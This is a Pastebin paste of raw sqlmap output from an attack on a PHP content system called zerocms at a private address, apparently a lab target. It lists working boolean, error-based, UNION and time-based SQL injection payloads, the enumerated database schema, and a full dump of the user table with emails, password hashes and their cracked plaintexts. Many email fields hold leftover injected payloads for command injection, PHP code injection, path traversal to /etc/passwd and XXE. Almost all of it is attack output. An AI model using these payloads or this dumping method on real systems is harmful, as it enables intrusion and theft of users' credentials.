Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: active fingerprint: MySQL >= 5.5.0
- html error message fingerprint: MySQL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- current database: 'zerocms'
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_access_levels
- [3 entries]
- +---------------+--------------+
- | access_name | access_level |
- +---------------+--------------+
- | User | 1 |
- | Moderator | 2 |
- | Administrator | 3 |
- +---------------+--------------+
- Database: zerocms
- Table: zero_articles
- [1 entry]
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- Database: zerocms
- [4 tables]
- +--------------------+
- | zero_access_levels |
- | zero_articles |
- | zero_comments |
- | zero_users |
- +--------------------+
- Database: zerocms
- Table: zero_articles
- [7 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | article_text | mediumtext |
- | is_published | tinyint(1) |
- | publish_date | datetime |
- | submit_date | datetime |
- | title | varchar(255) |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_access_levels
- [2 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | access_name | varchar(50) |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_comments
- [5 columns]
- +--------------+------------------+
- | Column | Type |
- +--------------+------------------+
- | article_id | int(10) unsigned |
- | comment_date | datetime |
- | comment_id | int(10) unsigned |
- | comment_text | mediumtext |
- | user_id | int(10) unsigned |
- +--------------+------------------+
- Database: zerocms
- Table: zero_users
- [5 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | access_level | tinyint(3) unsigned |
- | email | varchar(100) |
- | name | varchar(100) |
- | password | char(41) |
- | user_id | int(10) unsigned |
- +--------------+---------------------+
- Database: zerocms
- Table: zero_access_levels
- [3 entries]
- +---------------+--------------+
- | access_name | access_level |
- +---------------+--------------+
- | User | 1 |
- | Moderator | 2 |
- | Administrator | 3 |
- +---------------+--------------+
- Database: zerocms
- Table: zero_articles
- [1 entry]
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
- +---------+------------+---------+---------------------+---------------------+--------------+--------------+
- Database: zerocms
- Table: zero_comments
- [0 entries]
- +---------+------------+------------+--------------+--------------+
- | user_id | comment_id | article_id | comment_date | comment_text |
- +---------+------------+------------+--------------+--------------+
- +---------+------------+------------+--------------+--------------+
- Database: zerocms
- Table: zero_users
- [80 entries]
- +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
- | user_id | name | email | password | access_level |
- +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
- | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) | 3 |
- | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 (abcd1234) | 1 |
- | 3 | anarky | anarky@ | *23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123) | 1 |
- | 4 | default | default | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 5 | default | ;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 6 | default | a;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 7 | default | a);env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 8 | default | default;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 9 | default | default\nenv | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 10 | default | /e\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 11 | default | a;exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 12 | default | a;exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 13 | default | ";exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 14 | default | ";exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 15 | default | ';exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 16 | default | ';exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 17 | default | ".exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 18 | default | ".exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 19 | default | '.exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 20 | default | '.exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 21 | default | exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 22 | default | exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 23 | default | a`)` | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 24 | default | a`sleep 600` | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 25 | default | http://www.google.fr/? | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 26 | default | /etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 27 | default | /etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 28 | default | c:\\\\boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 29 | default | c:\\\\boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 30 | default | ../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 31 | default | ../../../../../../../../../../../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 32 | default | ../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 33 | default | ../../../../../../../../../../../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 34 | default | ../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 35 | default | ../../../../../../../../../../../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 36 | default | ../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 37 | default | ../../../../../../../../../../../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 38 | default | default/../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 39 | default | default/../../../../../../../../../../../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 40 | default | default/../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 41 | default | default/../../../../../../../../../../../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 42 | default | default/../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 43 | default | default/../../../../../../../../../../../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 44 | default | default/../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 45 | default | default/../../../../../../../../../../../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 46 | default | /etc/passwd\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 47 | default | /etc/passwd\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 48 | default | /etc/passwd\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 49 | default | /etc/passwd\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 50 | default | /etc/passwd\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 51 | default | /etc/passwd\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 52 | default | c:\\\\boot.ini\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 53 | default | c:\\\\boot.ini\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 54 | default | c:\\\\boot.ini\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 55 | default | c:\\\\boot.ini\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 56 | default | c:\\\\boot.ini\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 57 | default | c:\\\\boot.ini\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 58 | default | ../../../../../../../../../../etc/passwd\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 59 | default | ../../../../../../../../../../etc/passwd\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 60 | default | ../../../../../../../../../../etc/passwd\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 61 | default | ../../../../../../../../../../etc/passwd\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 62 | default | ../../../../../../../../../../etc/passwd\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 63 | default | ../../../../../../../../../../etc/passwd\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 64 | default | ../../../../../../../../../../etc/passwd\x00pix.gif | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 65 | default | ../../../../../../../../../../boot.ini\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 66 | default | ../../../../../../../../../../boot.ini\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 67 | default | ../../../../../../../../../../boot.ini\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 68 | default | ../../../../../../../../../../boot.ini\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 69 | default | ../../../../../../../../../../boot.ini\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 70 | default | ../../../../../../../../../../boot.ini\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 71 | default | ../../../../../../../../../../boot.ini\x00pix.gix | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 72 | default | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 73 | default | .depdb | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 74 | default | .depdb\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 75 | default | pearcmd.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 76 | default | pearcmd.php\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 77 | default | zero_transact_user.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 78 | default | zero_transact_user.php\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 79 | default | <blank> | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- | 80 | default | wgu1d3jvs4 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
- +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind (SELECT)
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
- ---
- web server operating system: Linux Debian 7.0 (wheezy)
- web application technology: Apache 2.2.22, PHP 5.4.4
- back-end DBMS: MySQL 5
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Parameter: #1* (URI)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
- Type: error-based
